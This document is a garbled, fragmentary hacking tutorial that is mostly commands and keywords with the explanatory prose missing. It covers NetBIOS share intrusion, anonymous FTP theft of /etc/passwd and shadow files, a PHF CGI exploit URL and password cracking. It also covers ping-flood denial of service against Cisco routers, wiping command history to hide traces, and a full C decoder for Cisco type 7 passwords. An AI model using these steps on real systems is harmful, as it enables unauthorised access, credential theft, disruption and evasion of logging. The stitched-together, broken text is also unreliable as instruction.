ping -t www.***.com
ping -t -a -f www.***.com
ping www.***.com
com/com.wav
com3/com3/.wav
com1/com.wav
ping -w timeout www.***.com
NETSTAT -S
NETSTAT -A
NETSTAT -N
NETSTAT -P
drwatson
NetBios Attack
Home Network
LAN WAN MAN
IP
1. IP (207.107.1.1)
2. START > RUN > CMD
3. Nbtstat -A IP
IP ADDRESS, ENTER
4.
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
------------------------------------
J-1 <00> UNIQUE Registered
WORK <00> GROUP Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01> GROUP Registered
5. HEX CODE VALUE <20>: PRINTER OR FILES SHARED TURNED ON
6.
Net view \\<insert ip_address here>
7.
Shared resources at \\ip_address
Sharename Type Comment
MY DOCUMENTS Disk
TEMP Disk
8. TEMP
Net use x: \\<insert IP address here>\temp
NETBIOS
User name - Password
PASSWD
FTP = File Transfer Protocol
Start ==> Run
telnet
Remote System
==> connect
Host Name
kahane.org
PORT 21
connect
!! source code
user anonymous
pass zzzoozz@yahoo.com
CuteFTP - WS_FTP
ftp.kahane.org
retr /etc/passwd
/etc/passwd
SunOS 5.0     /etc/shadow  /etc/passwd
Linux         /etc/shadow  /etc/passwd
BSD 4.3 Reno  /etc/master.passwd
AIX           /etc/security/passwd
NT            scripts/passwd
passwd
admin.pwl
exe
<< command >>
Start > Run: copy server.exe server.com
server
com, scr, bat
netstat
===========================
NETSTAT
NETSTAT -A
NETSTAT -E
NETSTAT -N
NETSTAT -P
NETSTAT -R
NETSTAT -S
FTP
21
FTP
SuperScan
Start
Run
ftp n
ftp>
Open
Enter
ftp>
To
To
IP
Connected to www.assassin.com
220 websrv1 Microsoft FTP Service (Version 4.0).
ftp> quote user ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
ftp> quote cwd ~root
530 Please login with USER and PASS
ftp> quote pass ftp
20
pwd
cd
cd black
ls
get
get black.exe
put
get
put black.exe
close
Codes: Meaning
110  Restart marker reply.
120  Service ready in nnn minutes. (nnn is a time)
125  Data connection already open; transfer starting.
150  File status okay; about to open data connection.
200  Command okay.
202  Command not implemented, superfluous at this site.
211  System status, or system help reply.
212  Directory status.
213  File status.
214  Help message.
215  NAME system type.
220  Service ready for new user.
221  Service closing control connection.
225  Data connection open; no transfer in progress.
226  Closing data connection.
227  Entering passive mode (h1, h2, h3, h4, p1, p2).
sys : sys
sys : sysadm
sys : system
games : games
ftp : ftp
mail : mail
Unix
young
test
unpassworded accounts
GET /etc/passwd
GET /etc/group
GET /etc/shadow
data = download
===========================
passwd ?
root
su username
1. /etc
2. shadow
shadow / unshadow
3.
:
sirhack:89fGc%^7&a,Ty:100:100:Sir Hackalot:/usr/sirhack:/bin/sh
1. sirhack
2. 89fGc%^7&a,Ty
3. Sir Hackalot
4. /usr/sirhack
5. /bin/sh
===========================
group ?
passwd
===========================
shadow ?
passwd
===========================
1. Cracker Jack
2. John the Ripper
http://www.openwall.com/john/john1.6.tar.gz
http://www.openwall.com/john/john16w.zip
+++++++++++++++++++++++++++
enter :
HELP = HELP
COPY = CP
MOVE = MV
DIR = LS
DEL = RM
CD = CD
WHO (FINGER)
FINGER
/etc directory
passwd
Cracker Jack
http://www.geocities.com/SiliconValley/9185
sable.ox.ac.uk/pub/wordlists
4 8
Cracker Jack
anonymously
ftp
/etc directory
Cracker Jack
PHF
http://xxx.xxx.xxx/cgi-bin/phf?Qali...t%20/etc/passwd
backup
/etc/shadow
apache
+++++++++++++++++++++++++++
port
Start > Run
command.com
ping host
ping port
enter
ping port1027
enter
ping port80
enter
ping
enter
ping port
enter
===========================
&&&&&&&&&&&&&&&&&&&
netbios
http://digitalx.150m.com/1.htm
&&&&&&&&&&&&&&&&&&&
dos
^^^^^^^^^^^^^^^^^^^^^^^
http://b0iler.eyeonsecurity.net/tutorials/powerdos.htm
Hacking Networks Routers
Cisco Routers
Cisco Systems
cisco systems
------------------------------------ :
IP ISP TCP/IP packet - spoof IP
IP
IP
log
IRC
ICQ
"do not show ip"
"systat"
IP - logging java
IP
Sub7, NetBus
-------------------------------------------- : ISP = Internet Service Provider
dial-up
traceroute ISP
tracert 222.222.22.22

Tracing route to [221.223.24.54]
over a maximum of 30 hops:

  1   147 ms   122 ms   132 ms  your.isp [222.222.22.21]
  2   122 ms   143 ms   123 ms  isp.firewall [222.222.22.20]
  3   156 ms   142 ms   122 ms  aol.com [207.22.44.33]
  4     *        *        *     Request timed out.
  5   101 ms   102 ms   133 ms  cisco.router [194.33.44.33]
  6   233 ms   143 ms   102 ms  something.ip [111.11.11.11]
  7   222 ms   123 ms   213 ms  netcom.com [122.11.21.21]
  8   152 ms   211 ms   212 ms  blahblah.tts.net [121.21.21.33]
  9   122 ms   223 ms   243 ms  altavista.34.com [121.22.32.43]   <<< target's isp
 10   101 ms   122 ms   132 ms  221.223.24.54.altavista.34.com [221.223.24.54]

Trace complete.
----------------------------------: TCP/IP packet -
logs
bandwidth
Ping flooding
-t
Unix
Linux ping -f
-------------------------------------------- : TraceRoute
MS-DOS prompt
"tracert ip.address"
firewalls ISP (internet service provider)
TraceRoute :
TraceRoute
TCP/IP
packet header
TTL
Time To Live
TTL
bandwidth TTL
ICMP
TraceRoute
-------------------------------------------- : proxy server
proxy server
telnet hyperterminal
===========================
: cisco router
cisco router
cisco routers
T1 18
ISP
ISP
DENIAL OF SERVICE
Telnet
packets
decoded
trusted systems
rcp rsh
(rcp rsh) Network Services
------------------------------------------------------------------- : cisco router
ISP
traceroute
(ISP)
ISP traceroute
IP
ISP
tracert 222.222.22.22

Tracing route to [221.223.24.54]
over a maximum of 30 hops:

  1   147 ms   122 ms   132 ms  your.isp [222.222.22.21]
  2   122 ms   143 ms   123 ms  isp.firewall [222.222.22.20]
  3   156 ms   142 ms   122 ms  aol.com [207.22.44.33]
  4     *        *        *     Request timed out.

firewall
Ping
firewall
23
proxy server
23
LOGs
------------------------------------------------------------------- : cisco router
v4.1 software
23
10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk
reboot
offline
freeze 10-2
v4.1 software
DOS
"ping -l 56550 cisco.router.ip -t"
frozen
"admin"
default
password
frozen
default
prompt :
"htl-textil" "?"
transfer
command
IP
23
(HyperTerminal)
wait for a call
HyperTerminal
yes
history
"history size 0"
Logout
-------------------------------------------------------------------- : cisco router
John the Ripper
compile
Ctrl + Shift
/*
 * Cisco IOS "type 7" password decoder (the program the tutorial asks you
 * to compile).  Type 7, produced by "service password-encryption", is a
 * reversible XOR against the fixed key table below, so it is obfuscation
 * rather than encryption: anyone holding a copy of the config can recover
 * the plaintext.  When auditing configs, treat "password 7" lines as
 * cleartext and migrate them to hashed types (5, 8 or 9).
 *
 * Usage:  cdecrypt -p <encrypted password>
 *         cdecrypt <router config file> [output file]
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* fixed XOR key: "dsfd;kfoA,.iyewrkldJKD" */
static const unsigned char xlat[] = {
    0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
    0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
    0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};

/* line prefixes matched at the start of a config line, as in the original */
static const char pw_str1[] = "password 7 ";
static const char pw_str2[] = "enable-password 7 ";

static const char *pname;

/*
 * Decode one type 7 string: two decimal digits give the starting offset
 * into xlat, then each hex byte pair is XORed with the next key byte.
 * Returns 0 on success and -1 on malformed input.
 */
int cdecrypt(const char *enc_pw, char *dec_pw)
{
    size_t len = strlen(enc_pw);
    size_t i;
    unsigned int seed, val;

    if (len < 4 || (len & 1))
        return -1;
    if (!isdigit((unsigned char)enc_pw[0]) || !isdigit((unsigned char)enc_pw[1]))
        return -1;
    seed = (enc_pw[0] - '0') * 10 + (enc_pw[1] - '0');
    if (seed > 15)
        return -1;
    /* the original read past xlat for long passwords; reject them instead */
    if (seed + (len - 2) / 2 > sizeof(xlat))
        return -1;

    for (i = 2; i < len; i += 2) {
        int hi = toupper((unsigned char)enc_pw[i]);
        int lo = toupper((unsigned char)enc_pw[i + 1]);
        if (!isxdigit(hi) || !isxdigit(lo))
            return -1;
        val = (isdigit(hi) ? hi - '0' : hi - 'A' + 10) * 16
            + (isdigit(lo) ? lo - '0' : lo - 'A' + 10);
        dec_pw[i / 2 - 1] = (char)(val ^ xlat[seed++]);
    }
    dec_pw[len / 2 - 1] = '\0';
    return 0;
}

static void usage(void)
{
    fprintf(stdout, "Usage: %s -p <encrypted password>\n", pname);
    fprintf(stdout, "       %s <router config file> [output file]\n", pname);
}

int main(int argc, char **argv)
{
    FILE *in = stdin, *out = stdout;
    char line[257];
    char passwd[65];
    size_t pw_pos;

    pname = argv[0];

    if (argc > 1) {
        if (argc > 3) {
            usage();
            exit(1);
        }
        if (argv[1][0] == '-') {
            switch (argv[1][1]) {
            case 'h':
                usage();
                break;
            case 'p':
                if (argc < 3 || cdecrypt(argv[2], passwd)) {
                    fprintf(stderr, "Error.\n");
                    exit(1);
                }
                fprintf(stdout, "password: %s\n", passwd);
                break;
            default:
                fprintf(stderr, "%s: unknown option.\n", pname);
            }
            return 0;
        }
        if ((in = fopen(argv[1], "r")) == NULL) {
            perror(argv[1]);
            exit(1);
        }
        if (argc > 2 && (out = fopen(argv[2], "w")) == NULL) {
            perror(argv[2]);
            exit(1);
        }
    }

    /* copy the config through, replacing type 7 strings with plaintext */
    while (fgets(line, sizeof(line), in) != NULL) {
        line[strcspn(line, "\r\n")] = '\0';
        pw_pos = 0;
        if (!strncmp(line, pw_str1, strlen(pw_str1)))
            pw_pos = strlen(pw_str1);
        else if (!strncmp(line, pw_str2, strlen(pw_str2)))
            pw_pos = strlen(pw_str2);

        if (!pw_pos) {
            fprintf(out, "%s\n", line);
            continue;
        }
        if (cdecrypt(&line[pw_pos], passwd)) {
            fprintf(stderr, "Error.\n");
            exit(1);
        }
        if (pw_pos == strlen(pw_str1))
            fprintf(out, "%s", pw_str1);
        else
            fprintf(out, "%s", pw_str2);
        fprintf(out, "%s\n", passwd);
    }
    if (in != stdin)
        fclose(in);
    if (out != stdout)
        fclose(out);
    return 0;
}
Linux
John the Ripper
-------------------------------------------- John the Ripper
http://www.openwall.com/john/
-------------------------------------------
  <1-99>           Session number to resume
  access-enable    Create a temporary Access-List entry
  access-profile   Apply user-profile to interface
  clear            Reset functions
  connect          Open a terminal connection
  disable          Turn off privileged commands
  disconnect       Disconnect an existing network connection
  enable           Turn on privileged commands
  exit             Exit from the EXEC
  help             Description of the interactive help system
  lock             Lock the terminal
  login            Log in as a particular user
  logout           Exit from the EXEC
  mls              exec mls router commands
  mrinfo           Request neighbor and version information from a multicast router
  mstat            Show statistics after multiple multicast traceroutes
  mtrace           Trace reverse multicast path from destination to source
  name-connection  Name an existing network connection
  pad              Open a X.29 PAD connection
  ping             Send echo messages